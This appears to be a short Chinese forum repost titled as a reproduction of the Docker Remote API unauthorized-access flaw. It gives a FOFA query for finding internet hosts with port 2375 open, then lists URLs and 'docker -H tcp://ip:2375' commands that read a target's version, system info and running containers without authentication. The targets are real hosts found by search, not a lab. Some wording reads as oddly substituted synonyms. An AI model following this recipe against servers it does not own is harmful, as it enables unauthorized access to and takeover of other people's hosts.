ToB企服应用市场:ToB评测及商务社交产业平台

标题: Docker Remote API未授权访问漏洞复现 [打印本页]

作者: 农民 时间: 2025-2-16 22:39
标题: Docker Remote API未授权访问漏洞复现
一、漏洞信息

Docker Remote API如设置不当可导致未授权访问，被攻击者恶意利⽤。攻击者⽆需认证即可访问到Docker数据，可能导致敏感信息泄露，⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息，或对敏感⽂件进⾏修改，最终完全控制服务器。

二、漏洞复现

1.利用以下fofa语句对docker产品举行搜刮：

port="2375"

复制代码

2.在搜刮的结果网站后访问以下路径

http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息

复制代码

3.可以利用-H参数连接目标主机的docker

docker -H tcp://ip:2375 ps #查看目标主机运行的镜像
docker -H tcp://ip:2375 version #查看目标主机的版本信息
docker -H tcp://ip:2375 info #查看目标主机的容器信息

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)